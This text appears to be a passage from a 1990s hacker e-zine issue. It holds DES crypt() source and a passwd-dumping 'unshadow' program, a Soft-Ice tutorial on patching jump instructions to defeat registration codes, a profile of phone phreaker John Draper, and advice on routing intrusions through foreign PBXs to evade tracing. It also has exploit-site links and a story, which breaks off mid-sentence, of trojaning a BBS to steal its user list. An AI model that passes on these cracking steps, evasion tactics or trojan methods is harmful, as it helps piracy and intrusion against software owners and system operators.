1,10, 6,12,11, 9, 5, 3, 8, 4, 1,14, 8,13, 6, 2,11,15,12, 9, 7, 3,10, 5, 0, 15,12, 8, 2, 4, 9, 1, 7, 5,11, 3,14,10, 0, 6,13, 15, 1, 8,14, 6,11, 3, 4, 9, 7, 2,13,12, 0, 5,10, 3,13, 4, 7,15, 2, 8,14,12, 0, 1,10, 6, 9,11, 5, 0,14, 7,11,10, 4,13, 1, 5, 8,12, 6, 9, 3, 2,15, 13, 8,10, 1, 3,15, 4, 2,11, 6, 7,12, 0, 5,14, 9, 10, 0, 9,14, 6, 3,15, 5, 1,13,12, 7,11, 4, 2, 8, 13, 7, 0, 9, 3, 4, 6,10, 2, 8, 5,14,12,11,15, 1, 13, 6, 4, 9, 8,15, 3, 0,11, 1, 2,12, 5,10,14, 7, 1,10,13, 0, 6, 9, 8, 7, 4,15,14, 3,11, 5, 2,12, 7,13,14, 3, 0, 6, 9,10, 1, 2, 8, 5,11,12, 4,15, 13, 8,11, 5, 6,15, 0, 3, 4, 7, 2,12, 1,10,14, 9, 10, 6, 9, 0,12,11, 7,13,15, 1, 3,14, 5, 2, 8, 4, 3,15, 0, 6,10, 1,13, 8, 9, 4, 5,11,12, 7, 2,14, 2,12, 4, 1, 7,10,11, 6, 8, 5, 3,15,13, 0,14, 9, 14,11, 2,12, 4, 7,13, 1, 5, 0,15,10, 3, 9, 8, 6, 4, 2, 1,11,10,13, 7, 8,15, 9,12, 5, 6, 3, 0,14, 11, 8,12, 7, 1,14, 2,13, 6,15, 0, 9,10, 4, 5, 3, 12, 1,10,15, 9, 2, 6, 8, 0,13, 3, 4,14, 7, 5,11, 10,15, 4, 2, 7,12, 9, 5, 6, 1,13,14, 0,11, 3, 8, 9,14,15, 5, 2, 8,12, 3, 7, 0, 4,10, 1,13,11, 6, 4, 3, 2,12, 9, 5,15,10,11,14, 1, 7, 6, 0, 8,13, 4,11, 2,14,15, 0, 8,13, 3,12, 9, 7, 5,10, 6, 1, 13, 0,11, 7, 4, 9, 1,10,14, 3, 5,12, 2,15, 8, 6, 1, 4,11,13,12, 3, 7,14,10,15, 6, 8, 0, 5, 9, 2, 6,11,13, 8, 1, 4,10, 7, 9, 5, 0,15,14, 2, 3,12, 13, 2, 8, 4, 6,15,11, 1,10, 9, 3,14, 5, 0,12, 7, 1,15,13, 8,10, 3, 7, 4,12, 5, 6,11, 0,14, 9, 2, 7,11, 4, 1, 9,12,14, 2, 0, 6,10,13,15, 3, 5, 8, 2, 1,14, 7, 4,10, 8,13,15,12, 9, 0, 3, 5, 6,11, }; /* * P is a permutation on the selected combination * of the current L and key. */ static char P[] = { 16, 7,20,21, 29,12,28,17, 1,15,23,26, 5,18,31,10, 2, 8,24,14, 32,27, 3, 9, 19,13,30, 6, 22,11, 4,25, }; /* * The current block, divided into 2 halves. */ static char L[32], R[32]; static char tempL[32]; static char f[32]; /* * The combination of the key and the input, before selection. */ static char preS[48]; /* Lines added to clean up ANSI/POSIX namespace */ #ifdef _NAMESPACE_CLEAN #undef encrypt #pragma _HP_SECONDARY_DEF _encrypt encrypt #define encrypt _encrypt #endif /* * The payoff: encrypt a block. */ void encrypt(block, edflag) char *block; int edflag; { int i, ii; register int t, j, k; /* * First, permute the bits in the input */ for(j=0; j < 64; j++) L[j] = block[IP[j]-1]; /* * Perform an encryption operation 16 times. */ for(ii=0; ii < 16; ii++) { i = ii; /* * Save the R array, * which will be the new L. */ for(j=0; j < 32; j++) tempL[j] = R[j]; /* * Expand R to 48 bits using the E selector; * exclusive-or with the current key bits. */ for(j=0; j < 48; j++) preS[j] = R[E[j]-1] ^ KS[i][j]; /* * The pre-select bits are now considered * in 8 groups of 6 bits each. * The 8 selection functions map these * 6-bit quantities into 4-bit quantities * and the results permuted * to make an f(R, K). * The indexing into the selection functions * is peculiar; it could be simplified by * rewriting the tables. */ for(j=0; j < 8; j++) { t = 6*j; k = S[j][(preS[t+0]<<5)+ (preS[t+1]<<3)+ (preS[t+2]<<2)+ (preS[t+3]<<1)+ (preS[t+4]<<0)+ (preS[t+5]<<4)]; t = 4*j; f[t+0] = (k>>3)&01; f[t+1] = (k>>2)&01; f[t+2] = (k>>1)&01; f[t+3] = (k>>0)&01; } /* * The new R is L ^ f(R, K). * The f here has to be permuted first, though. */ for(j=0; j < 32; j++) R[j] = L[j] ^ f[P[j]-1]; /* * Finally, the new L (the original R) * is copied back. */ for(j=0; j < 32; j++) L[j] = tempL[j]; } /* * The output L and R are reversed. */ for(j=0; j < 32; j++) { t = L[j]; L[j] = R[j]; R[j] = t; } /* * The final output * gets the inverse permutation of the very original. */ for(j=0; j < 64; j++) block[j] = L[FP[j]-1]; } /* Lines added to clean up ANSI/POSIX namespace */ #ifdef _NAMESPACE_CLEAN #undef crypt #pragma _HP_SECONDARY_DEF _crypt crypt #define crypt _crypt #endif char * crypt(pw, salt) char *pw, *salt; { register int i, j, c; int temp; static char block[66], iobuf[16]; for(i=0; i < 66; i++) block[i] = 0; for(i=0; (c= *pw) && i < 64; pw++) { for(j=0; j < 7; j++, i++) block[i] = (c>>(6-j)) & 01; i++; } setkey(block); for(i=0; i < 66; i++) block[i] = 0; for(i=0; i < 2; i++) { c = *salt++; iobuf[i] = c; if(c > 'Z') c -= 6; if(c > '9') c -= 7; c -= '.'; for(j=0; j < 6; j++) { if((c>>j) & 01) { temp = E[6*i+j]; E[6*i+j] = E[6*i+j+24]; E[6*i+j+24] = temp; } } } for(i=0; i < 25; i++) encrypt(block, 0); for(i=0; i < 11; i++) { c = 0; for(j=0; j < 6; j++) { c <<= 1; c |= block[6*i+j]; } c += '.'; if(c > '9') c += 7; if(c > 'Z') c += 6; iobuf[i+2] = c; } iobuf[i+2] = 0; if(iobuf[1] == 0) iobuf[1] = iobuf[0]; return(iobuf); } Now the Unshadow Source Code: #include main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } .-==[Basic Cracking by TNSe'97]==============================================-. |===[By: TNSe]=[BHM#4]=[15k]=[#08]============================================| `-===========================================================================-' Basic Cracking by TNSe^97 Well, I guess you are reading here to learn about how to get rid of those damn codes on that game, or those idiotic delays on some programs! Then, you are reading the rite place! I'll try to learn you how to use Soft-Ice 95, and give you some examples on how to crack. First of all, you will need the following things: * Soft Ice for Windows 95 (This is the best, drop the rest!) * A hex editor for files. (Diskedit.exe, or good ol' PCTools.exe) * Some knowledge of assembly codes. * A piece of paper (For writing down notes... :) * A pen (The paper is useless without ... ) * A lot of time * More time (Some times... ) First step is to install Soft Ice for Win'95, I'll leave that up to your imagination. Just keep trying. I will recommend that you have at least SOME knowledge of assembly. If you don't, you might get some problems. The one thing I can't help you with, is time. Sorry, but it seems like it still is 24 hrs in one day, 60 mins in a hr and 60 secs in a min... (Damn that suxx) The next step is to start up Soft Ice. To do that, you must press F8 when it says "Starting Windows 95" (Or whatever it says in different languages), Select option 5, start in MS-DOS mode, and when you get to the dos-prompt, change to the Soft Ice dir (My : C:\SIW95) and type WINICE. What you also might want to do is add the Soft Ice dir to your path (Very recommended, since the rest of the document assumes this...) Now you will probably notice that your machine is working its but off. That is because it is starting Win'95. When you have entered Win'95, go to MS-DOS shell. Now comes the fun part. First of all change to the directory of the program you want to crack. Then type DLDR . What happens next is that you will get up a screen that Shows a lot of not understandable (for you that is) shit. If someone hasn't changed the configuration, the following should be correct: 1. At the top you see the registers. They contain certain data, that programs manipulate. They are sorta important. They can be changed by typing "r", and then look for the cursor. 2. Under the registers, you will find some data part. It is useful if you think you know where in the memory the codes are... You can change what it is showing by typing "d ". 3. This is the important spot. This is where the code is located. I recommend typing "code on", then you will see what the different codes are in numbers. Pressing "t" will follow you through the program byte by byte, "p" will skip Calls and Ints, so I recommend you use "p". "x" will make the program run just as it usually does, press "x" and see for yourself! Now to the part that requires a bit of knowledge about assembly. The command "a " can be helpful. It makes it possible to change an opcode in the middle of the program while it is running. This makes it possible to change where the program would go if the code was correct, or if the code was wrong... Another helpful code is "bpx ". Look at the third or fourth line in the code window. It probably says something like: (From COMMAND.COM) 09E5:0105 BF1B01 MOV DI,011B Now enter "bpx 0105" and you will see that line get another color than the others. If you press "x" now, the program will stop every time it passes this point. Try. It stopped rite? Yeah. Now ... Let's try to hack example one. (To enter write DLDR CRKEXAM1.EXE) First of all, if you understand pascal, look at the source (CRKEXAM1.PAS) and try to understand it. Now... Press "p" until the program asks for the code, and then press enter. Now you will see something like this: (4) 1 ????:00C5 E85EFF CALL 0026 2 ????:00C8 08C0 OR AL,AL (This line is highlighted) 3 ????:00CA 741E JZ 00EA As you probably have experienced, the highlighting means that the machine is about to execute that line. Now lets take a closer look at the lines. Line 1 is a call, that means it does something, like (in this example) gets and checks the keyboard input. (CALL 0026 is really the Function CodeCorrect:Boolean; ) Line 2 is the standard way of checking Boolean Functions. If AL is 0 (FALSE in pascal and C++), which means that the code is not correct, Press "p" and line 3 will be highlighted, and you can see, that the JZ 00EA will be executed. (Because of the JUMP to the right) What we would like to do, is to make the machine give a damn even if the code is wrong or correct. Solution: (Before you do this, write down the opcodes, see above where you can find the 4 in parenthesis, write that down, it is important. Here you would write down : E85EFF 08C0 741E change to E85EFF 08C0 9090) Enter "a 00CA". Then you will get something like this: ????:000000CA Enter : Nop (NOP = No operation, do nothing, just like ????:000000CB NOP we want! Good?) ????:000000CC (Just press enter) Now look what we got: 1 ????:00C5 E85EFF CALL 0026 2 ????:00C8 08C0 OR AL,AL 3 ????:00CA 90 NOP (This line is highlighted) 4 ????:00CA 90 NOP As you see, we changed the "741E" to "9090". Now Press "x". Wow ... It worked! (If it didn't, try again... ) Now, for the easiest part. (Always) Make a backup of the .EXE file. Try: copy crkexam1.exe crkexam1.bak 1 file(s) copied We are going to edit the executable. I recommend using one of these programs: Diskedit PCTools and some others that I do NOT remember the name of... ... For Diskedit and PCTools you MUST enter MS-DOS MODE and type LOCK (answer yes) before using them... Now, enter these programs, and find the file we would like to edit. (In this case CRKEXAM1.EXE) You will get up a silly screen with a lot of hexes and shit. Now find the search option. You will need search for HEX. Find the paper you wrote those numbers on (E85EFF 08C0 741E change to E85EFF 08C0 9090) and search for E85EFF08C0741E, when found, change the 741E to 9090 (Which means NOP NOP, do nothing) and save. Now start the file, and see... Whatever you type, you will ALWAYS get into the rest of the program! Now... That was example 1... Example 2 is alike, but a bit different... Do as you did on example 1, until it asks for the code. Back to these lines: (4) 1 ????:00C5 E85EFF CALL 0026 2 ????:00C8 08C0 OR AL,AL (This line is highlighted) 3 ????:00CA 741E JZ 00EA Pressing "p" now, you will notice that it says "NO JUMP" to the right. It will only jump when the code is correct! Damn... how to do this? Well.... "a 00ca" ????:000000CA JMP 00EA And Voila: 1 ????:00C5 E85EFF CALL 0026 2 ????:00C8 08C0 OR AL,AL 3 ????:00CA EB1E JMP 00EA (This line is highlighted) Aha... It will now ALWAYS jump to where it should, if the code was correct! Yippeee... Note on your paper: E85EFF 08C0 741E change to E85EFF 08C0 EB1E. Go do it! Now! As you have seen on the two previous examples, changing two bytes, even one byte can remove the codes... But remember, this is just the BASICS of cracking... DO NOT EXPECT EVERYTHING TO BE SO EASY AS THIS... hehe But practice helps... Helpful hints... (Nice Tricks) There are a lot of cool commands in Soft Ice. Personally I like the "bpr ". This command will make you enter Soft Ice every time the program writes or reads to this adress. Good Hint: "bpr b800:0000 b800:1000" will make you enter Soft Ice EVERY time something is written to the screen in text mode... "bpr a000:0000 a000:ffff" will do the same for Graphics mode. Another cool thing is "bpint ". This command enters Soft Ice every time the program does the interrupt you specified. I'll leave this command up to you and Ralph Browns interrupt list. If you Ever should be so unlucky to encounter something like this: 1 ????:001F LODSB 2 ????:0020 STOSW 3 ????:0021 DEC CX 4 ????:0022 JNZ 001F 5 ????:0024 JMP 00FF You would probably notice that when you press "p" it will continue looping between 1 and 4 for a while. If you are REALLY unlucky, CX might be equal to 0FFFFh. You would then have to press "p" about 250000 times. Solution: enter "bpx 0024" and line 5 will be highlighted, then press "x". Now .. you are on line 5, and all is well. "bpx" means break point on execution. Also... stop executing when you come to line 5. After a while, all the breakpoints you have made, can be annoying. You can list them by typing "bl". You can disable them by typing "bd " and enable them again by typing "be ". If you just don't need a breakpoint anymore, type "bc ". If you accidentally deleted a breakpoint, and want it back, you can look at the breakpoint history, "bh". The guys who made Soft Ice has been thinking a bit ... =). Another trick is to UNPACK the .EXE files BEFORE editing them. Some .EXE files are crypted or packed, and you will not be able to edit them before you have uncrypted them or unpacked them. Two good programs that I can think of rite now is UNPACK.EXE, PKLITE.EXE, XOE.EXE and UNP.EXE. There are muuuuccchhh more! TNSe^97/NS!^FooD .-==[Cereal Hacker: Legendary inspiration or a has-been?]====================-. |===[By: Steve Knopper/IU]=[BHM#4]=[17k]=[#09]================================| `-===========================================================================-' CEREAL HACKER - by Steve Knopper/IU ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ----------------------------------------------------------------------------- John Draper aka. Cap'n Crunch - Legendary inspiration or washed-up has-been? Cap'n Crunch made a name for himself in the early '70s as one of the pioneer phone phreaks. Today he sleeps at a campground, can't get a job and finds himself the prey of a new generation of hackers. ----------------------------------------------------------------------------- "What?" John Draper whispers, with panic and awe in his voice. He leans forward and stares into his Macintosh PowerBook 520. "What?" A gray-haired baby boomer who's making photocopies glances over at Draper, a wildeyed man with one front tooth and a scraggly beard. Draper, oblivious to everything except his computer screen, begins to shout: "3,672 mail messages? Holy fuck. Did I get spammed?" This Kinko's Copies in Mill Valley, Calif. doubles as Draper's office space. Everyday, he plops his scratched-up laptop onto the gray desk nest to the free Kinko's phone, hitches the wire to his computer jack and logs onto the internet. He usually spends a few hours checking e-mail and tinkering with his Web page. But today, a terrible thing has happened. "Oh, look at that!" he says loudly , ignoring the steady flow of Kinko's customers. "They've subscribed me to all these mailing lists." The Internet mocks him. His fast and shaking fingers flail over the keyboard, but the names of his new mailing lists by faster than he can press the delete key. "Welcome to dc-stuff" ... "Welcome to drewids news" ... "Welcome to compost" ... "Welcome to scream" ... "Welcome to barry-manilow". Draper is totally helpless this summer morning. "This is going to take forever," he says. The Kinko's customers are now studiously trying to ignore the homeless mans persistent outbursts. They don't know he's a living legend, and certainly, Draper, 53, doesn't carry himself as though he were one. In the early '70s Draper earned the nickname "Cap'n Crnuch" after discovering that a plastic whistle, packaged in a cereal box, was capable of blowing perfect 2,600-Hz tones. Blowing that same whistle into a phone receiver, a caller could make unlimited free phone calls around the block or around the world. Back at Kinko's, Draper repeatedly calls his system operatore for help, his voice occasionally devolving into a shaky whine, and frantically tries to dlete the offending e-mails. This attack, he says, will cripple his attempts to find a job through the Internet. Hackers have declared war on John Draper. He's not sure why, but since he put up his Web page last October (www.well.com/user/crunch/), he's begun receiving a steady flow of flames. "One said, 'You're just a has-been living in the past, you don't deserve to be a hacker,'" recounts Draper, who has tried to communicate with some of the e-mailers. The attacks have moved beyong being playful - some are even vicious and destructive. Draper says hackers have intercepted some of his messages to prospective employers and then encouraged them not to hire him. He says hackers have also intercepted private correspondence to his attorney and used it for further ridicule. It's the hacker eqyivalent of smacking your crotchety grandfather upside the head with a newspaper just to hear him yelp. At Kinko's wearing a pink Target T-shirt, blue jeans cut off under the knee, socks and tennis shoes, Draper vows revenge. He leaves a voice message for a man he thinks is an FBI agent. He tries to alert Internet security services. When the busy system operator begins screening calls, Draper leaves a half-dozen phone messages. He is outraged and defensive, which is under- standable. He is battling an enemy he can't see; worse, he can't figgure out why he's even under attack. "So what if I'm a has-been?" he asks. "So what if I'm talking about all the things I've done in the past?" In 1976 Draper spent four months in federal prison for wire fraud. He's certain the Feds are watching him, so he satus away from illegal phone calls; going so far as to include a link on his Web page to a page listing good legal deals from legitimate phone companies. Another prison term, he says, could put him away for 10 or 15 year: "By then, I'll be 65 or 70 years old. I want to live my life!" Five days later an anonymous message appears in the Usenet newsgroup news.admin.net_abuse.misc. "Johnny," a Colorado hacker in his early 20s, claims responsibility for the "main bomb" against Draper - and similar attacks on journalists, the White House, Rush Limbaugh, MTV executives and another famous elder hacker, Emmanuel Goldstein. In the lengthy message, Johnny writer this about Cap'n Crunch: "You are nothing. You haven't been anything for a long time. Quit this pretense of you knowing something about current phone systems." Johnny calls a couple of night after the attack to do a telephone interview. He's devilishly proud of his attack on the system and listens patiently to an account of Drapers' defense of himself. Johnny isn't fazed. Draper, he says, has committed an indescribable sin by contacting the FBI. Worse yet, in the eyes of working hackers everywhere, he continues to take credit for stuff he hasn't done in decades. "He's gone out of his way to mail quite a few hackers saying they're either stupid, lame or he's going to sue them or narc them out to the FBI," Johnny says. "That's not exactly in keeping with the hacker ethic." By way of response, Draper says the Secret Service is after Johnny for spamming the White House and that he had better watch out. * * The 1992 action movie Sneakers opens with two teenagers in 1969 using a college campus computer and telephone to mischievously arrange a 25,000$ Republican Party donation to the Black Panthers. The Police show up and capture one of the two hackers, the frightened and nerdy Cosmo. In the film, Cosmo turns up years later as a bad guy bent on world domination. The adult Cosmo, played by sophisticated Gandhi actor Ben Kingsley, wears impeccable suits and slicks back his hair into a distinguished pony tail. Even his accent sounds cool. The screenwriters modeled young Cosmo loosely after the young Draper - there's a clue early in the movie, when the other teen hacker, Robert Redford's character, briefly spells "CRUNCH" during a scrabble game. In real life, however, Cap'n Crunch looks nothing like the vouge Kingsley character. Draper is homeless and smells as though he hasn't showered in days. He becomes obsessed and adamant about trivial things. At a Mill Valley sandwich shop, he asks a Hispanic busboy wheter or not the resturant payphone accepts incomming calls. The busboy looks confused, and Draper quickly snaps, "Do you speak english?" The busboy does, but he was momentarily stunned by Draper's random question about the phones. Draper resembles the familiar caricature of God, with flowing beard and wavy gray hair - only it's standing on end, energized, as though his finger has been stuck in an outlet. He is still a hippe, talking road trips in recent years to the Rainbow Family Gathering in Missouri, San Diego, Texas, Australia and Russia. He still regrets ignoring a sign to the original Woodstock, which he dis- regarded because he hadn't heard of the scheduled bands. In 1990, Draper was diagnosed with a degenerative lumbar disc in his back. He spent two years working with a chiropractor and a personal trainer and gradually healed. Today, he performs yoga and tai chi, working out regularly at a local health club and vlounteering to give friends and strangers "energy work" or backrubs. He dances all night at Bay Area rave parties at last three times a week. He talks proudly about his stamina and how younger people can't keep up with him. But the shiniest sparkle in his constantly dilated blue eyes comes when he's telling hacker war stories. The stories made him famous. Every now and then a magazine will recall his past glory and stick him in a hacker article. Newsweek once ranked him among the top 20 hackers of all time. Earlier this year, Forbes ASAP called him "Cap'n Crunch, King of the Phreakers," and the PacificSun, a Nort Bay alternative weekly, credited Crunch with being a little guy who outsmarted the big companies en route to becoming a "hippie legend." After `Sneakers' was released, CBS' "This Morning" put him on the air ("My story is a lot more complex and interesting", he told the show). And to interview Draper, Art Bell, a natinally syndicated radio talk-show host, crounched on a foam mattress beside the phreaker legend inside a campground restroom. His "Crunchman" Web page proudly and painstakingly preserves his fascinating tales. "You know," he says, "all this publicity and I still haven't been able to find a job." On his web page, he complains: "With all the fame I've accumulated, I've never accumulated one red cent for all the hassles I've endured in all of this 25-year story." Draper's 25-year story actually began in Alaska when he was an Airman Second Class with the U.S. Air Force. He was stationed in a deserted post with 60 or 70 other men in the middle of frigid nowhere, marooned from women and civilization. He had to come up with something to pass the time, so he built a ham radio and became a sort of underground military DJ. He also started messing with the phones, using loopholes in the Air Force and Alaskan switchboard to make free phone calls home. After his honorable discharge, he called the base, spliced his voice into the public address system and publicity told the commander where he could go. Later, while working as a National Semiconductor engineer, a blind kid named Dennie called crunch, at random, to test some phone tricks. Dennie told Draper he was a "phreak" - A slang term that mixes the words "frequently" , "phone", "freak", and "free" - and knew 200 different methods of making free long distance calls. Draper was intrigued. He met with Deniie one day and followed him to a dark room where he was introduced to two other blind phreakers. They showed Draper how to pick up a "trunk," or an open phone line, and use a musical organ to shoot tones into the receiver. Draper showed Dennie a few technical things he'd learned, and the two became friends. Upon returning home that day, Draper shoved his brother off the family pioano so he could successfully record the right tones. Shouting, "It works!" he rushed back and forth between his room and the piano. "I was bouncing off the walls. My dad was just sort of shaking his head like, "What have I raised, here?" The blind kids requested that Draper build a "blue box" to mechanically create these tones and shoot them into the phones; this box was more portable and efficient then an organ, whistle or piano. Draper did just this and often took long blue-boxing trips in his Volkswagen van, calling surprised friends for free all over the country. Blue-boxing became the cornerstone of phreaking - with today's more sophisticated technology, slightly modified phone dialers called red boxes are used instead. Draper owns up to a slight correction of his myth - the blind kids, he says, told him about the Cap'n Crunch whistle. He used it only after their recommendation. A strange underground fame, however, got attached to his name. Stories about Draper and his phreak friends calling the White House, reaching President Nixon personally, telling him about a crisis-level shortage of toilet paper, giggling and hanging up, circulated around the country back in the '70s. People started seeking out Draper's advice on phreaking and hacking. A college student named Steve Wozniak contacted him for a blue-box lesson. Draper obliged, and Wozniak contacted the Pope and called a payphone at London's Grand Central Station. Crunch tried to teach Wozniak never to sell the equiptment because he'd get in trouble, but Wozniak did anyway, using the cash to put himself through college and build his first computer. Wozniak went on to co-found Apply Computer. Today, both friends have reciprocal links on their Web pages. In 1971, writer Ron Rosenbaum who had interviewed many phreaks in the growing worldwide network, called Draper for an Esquire magazine story. Draper was suspicious, but agreed to it anyways. Despite a few errors - Draper's Web page carefully lists each inaccuracy - Rosenbaum's piece was thorough, and shocked a technologically unsawy America with tales of snot- nosed kids outwitting Ma Bell. A few months later, the indictments and investigations began. Draper's peaceful phreak existance soon came crashing down around him. On day after finishing a computer class at his college, he stopped by a 7-11 before heading home. Four FBI agents jumped out and grabbed him in the parking lot. Draper was put on five yars probation for wire fraud. Four yars later he was convicted of the same crima and spent four months in California's Lompoc Federal Prison. He taught phone-phreak classes to prisoners to avoid beeing labeled uncooperative or as a snitch. "It was almost like a Boy Scout camp," he says. "I worked in the pug farm. I got kicked out because I kept putting judges' names on the pigs. They didn't like that too much." After his release from the prison, Draper began to drift. He wrote EasyWriter, a pioneering word-processing program, for an impressed Wozniak in the mid-'80s. He used his expertise to nail down few good jobs. In 1984, a former hacker hired Draper to work for his at a software company. Over the last three years he worked there, Draper says he began irritating his cigar- smoking supervisor (who he demaned not to smoke in the office). When the former hacker hired him left the company, so did Draper's protection. He was fired by the smoker. Since then, despite another year-long programming job that provided him with some savings and trusly PowerBook, he has had little professional success. For a while, Draper lived in a beautiful hunting lodge, but then the money ran out. He now sleeps at a campground. Draper admits however, that he now feels freer than ever before. * * Four hours later and the King of Phreakers is still freaking out in the middle of Kinko's. He hadn't counted on his crisis. He has a busy day planned. He has to meet his friend Symonty, an Australiancomputer programmer with fluorescent green hair, in downtown San Francisco later in the evening. Symonty was among the many, who after meeting with Draper at a rave a few nights back, was astouned by his bottomless energy. And, of course, Draper says he has to spend at least a few hours in the lazy afternoon sun, bumming around Mill Valley's red bricked Town Square. Draper finally switches his address to an unlisted account and gives up. He leaves the heavy deleting for the system administrator (his e-mail file has grown to 30 megabytes). His ranting finally slows to a hacking critique: "We might leave a note saying, 'kilroy was here,' but that's about it. But we never would have done anything like this mail spamming thing. (Hackers) are more damaging today than they were before. They have no remorse." At the Square, Draper immediately spots Don Fricault, a Larkspur software designer who likes to watch the babes emerge from Mill Valley's fancy restaurants and upscale coffee shops. Draper walks right up to him and asks his friend if he knows how to solve his e-mail problems. Fricault makes a couple of suggestions, but Draper methodically shoots them down. Fricault finally gives up, and Draper walks away to speak with other friends. Fricault met Draper a few years ago, and they briefly worked together designing Web pages for the Marin Cyber Group. Fricault had always known who Draper was - in college, he says, "We had him up as a hero. Those were rebellious times and everything." Today, Fricault says, Draper is "more like a character. His technical expertise is probally leveled off somewhat. He's got a commanding nature, and sometimes you have to back him off. But he's harmless, totally harmless. As soon as he heard about the Web, he put up his Web site. He likes to be the star." Fricault surveys the Square, pointing out the bare-chested playing chess, and then returns to his thoughts abour Draper. "There's too many characters here," he says. "It's like a TV show." Draper returns. "Guess what?" he asks Fricault. "Power is out in all the Western states." "It's probably the same guys who were spamming you," Fircault suggests. But Draper doesn't hear it. His pager has gone off and he's wandering back to spend more time with his most loyal friends - the phones. .-==[The hackers worst nightmare (?)]========================================-. |===[By: Codeblaster]=[BHM#4]=[04k]=[#10]=====================================| `-===========================================================================-' As many of us hackers, I started my hacking career as a BBS hacker and for years I've been hacking bbs' until I recently (finally) moved on the inet. There is one thing I don't understand about you inet hackers; The fear of beeing traced after a hack - and the fear of having left "clues" on the system that could expose your real identity. Don't get me wrong, it's not like I don't give a shit if the feds knock on my door tomorrow - it's not that. But it seems like people moving onto the internet are forgetting some of the good ol' methods they used before to prevent getting caught. Sure, you can clean your tracks on victim.gov, you can IPSpoof, you can do lotsa stuff to prevent the "victims" from finding you - but let's forget all that and look backwards... back to the "root" - stuff that software and scripts can't do, stuff that you do yourself. If you're going to hack nasa.gov or something similar, then it's nice to have some phreakin skills to - beeing a unix wizard isn't always enough. If I were to hack something as big as that, I would've done this; ---- 1. Gotten myself a fake internet account. - Read BHM#2 if you don't know how to do this. Either make one yourself or get one from a friend or something, whatever - as long as it isn't yours (and can't be traced back to you (like your fathers account or something like that)) 2. I would've gotten myself one, or even a couple of PBX's. 3. I would've called Telecom and requested that my number should not be available for ISDN/CALLER ID's. This way, my number is not sent over the line. I don't know if you can do this in the US, but here in Norway you can do it. ---- Now, after only doing these 3 things I've made it *ALOT* harder for the feds to catch me. Almost impossible. Before the hack I would've made my modem call internet like this: MODEM -> PBX1 -> PBX2 -> ISP The PBX1 would be located in my own area so that I wouldn't have to pay that much to fuck nasa over. Preferable the second PBX should be located in Eastern Europe (or some poor country antoher place in the world). Then I would've gone hax0rd nasa! :) What happens then? ------------------ Since I feel pretty safe I don't care if they trace my IP and shit, so the feds easily managed to trace that. Then they probably would have called my ISP to get my realname, address and phonenumber. My ISP would give them my fake info from the fake account. The feds would then find out that the info was fake (either at once, or some days of investigation later if you enter an existing dude's info ;)). Then the feds would probably get telecom to see who logged in on the ISP at that the time nasa was hacked. Then they find out wich of them had the fake IP. Now they would get a number, like +XX-EASTERN-EUROPE. Then they would probably realise that this one was going to get though. They manage to contact telecom in that poor country, but since there is a war going on in the country, they have better things to do then trace calls for the FBI. Better yet; you could choose a PBX in an country like IRAK or something, so when the FEDS call them they would probably hear something like "FUCK OFF AMERICANS!" ;) -> In short; If you're calling through a PBX in a country that has problems, they have better things to do than trace phone lines - so the feds will be stuck there. Even if the feds in some miracleous way manages to get the number that called the PBX in IRAK they would only get the PBX in your country. And then it's probably gone 14 days since you did the hack and all data about who called that PBX that day is deleted. (In Norway such info is deleted after 14 days - it's the law here (the Data Protection Registar) don't know if you have rules for that in US or the country you live in). Conclusion ---------- As you see, it would be *VERY* hard for the feds to get through this kind of security net. And if you're a unix wizard to you can always take those kind of precautions to :) Codeblaster/ns!^food^grs .-==[Find bugs in Unix Systems]==============================================-. |===[By: Ripperjack!]=[BHM#4]=[02k]=[#11]=====================================| `-===========================================================================-' MINI-ULTRA-HURRY-UP INTRODUCTION TO FIND BUGS IN UNIX SYSTEMS. 1. INTRO 2. LOOKING FOR SUID PROGRAMS 3. BUGTESTING THE SUID PROGRAMS 4. BUFFER OVERFLOWS 5. EXPLOITS AND WWW 1. INTRO The only way to find bugs in systems are to install them. I've just installed FreeBSD and have begun bugtesting it. I've found one bug in the latest version after about 10 hours of work. Bugtesting is a time consuming business, but if you know how to bugtest a system it can be kept down to a minimum. The first thing is to get to know the system; an manual would do fine. After you've done this you can go on to the next step. 2. LOOKING FOR SUID PROGRAMS Suid programs are those with a +s on them. They have when run the perms of the owner. This means if we can shell from a suid program we will have the perms of the owner. 3. BUGTESTING THE SUID PROGRAMS Bugtesting can as said be a time consuming business, but if the operator is stupid he may have all the defaults on. Maybe he hasn't removed stupid programs which can perform commands or he has installed some. Admins always think that their system never will be hacked. They use defaults and this makes them vunerable. 4. BUFFER OVERFLOWS A buffer overflow is when a program exceeds a buffer. In Unix when programs overflow they may leave you with the priveliges of the owner. These bugs are quite common. 5. EXPLOITS AND WWW If you're not willing to find bugs yourself, visit one of the below listed sites. They're all great sites for finding the latest and best exploits. www.rootshell.com www.enslaver.com/enslaver.html www.dhp.com/~fyoder/sploits_all.html http://www.tacd.com/exploit/ www.r0ot.org www.outpost9.com/exploits/exploits.html www.exploits.com cybrids.simplenet.com/hacking/archive.html sunshine.nextra.ro/fun/new ;_ripperjack signing off~' STING THE SUID PROGRAMS .-==[My first hack]==========================================================-. |===[By: Codeblaster]=[BHM#4]=[03k]=[#12]=====================================| `-===========================================================================-' Me and my hacker friend had planned this for several weeks now. We had tested it on my system, and the trojan worked perfect. We had uploaded it to our victim, and could barely wait to call back in excitement. We made some useless programs in pascal to get the time to fly, but one question kept popping into my head "Had the sysop runned the trojan now?". "Call back now!" my friend said every now and then, I just said that we had to wait another half an hour. Then... finally, it was time, the clock was 04:00 pm and we expected the sysop to have gone to bed now. We said nothing as my modem connected to the board. My friend told me what to login as, even though he know I remembered it better than him. Ah, inside, couln't bare the excitement now. "Test it.. come on test it!". No, not yet. Had to know that the sysop wasn't watching first. Paged him a couple of times, did some stupid errors, pretended not to find files and shit, and then - when I was pretty certain that he wasn't watching, I wrote the magic words on the command promt. I pressed ENTER, and there! the users started scrolling over my screen. I felt the adreanaline rushing through my vains, and heard a funny mixture of hardcore techno and my friends laughter in the background. Ah, this was it! I was a hacker, I really felt like one anyway. When all the users were listed, I just had to drop to dos and see if they were all listed in the capture, and they were. Haha, this was really cool I thought, petty those lamers that don't know anything else than playing games and such on their PC. My friend was even more excited than me, and tried to grab the keyboard. No way. I was in charge here. "But I have to do something!". Yeah, I have to do something to, I said. "Drop to dos!". Good idea. I used the sysop commands and dropped to dos, the lamer had a funny prompt saying 'Enter Your Command Master#>' - it made the feeling even better. We fucked around in his dos for several hours, downloading the files we wanted and 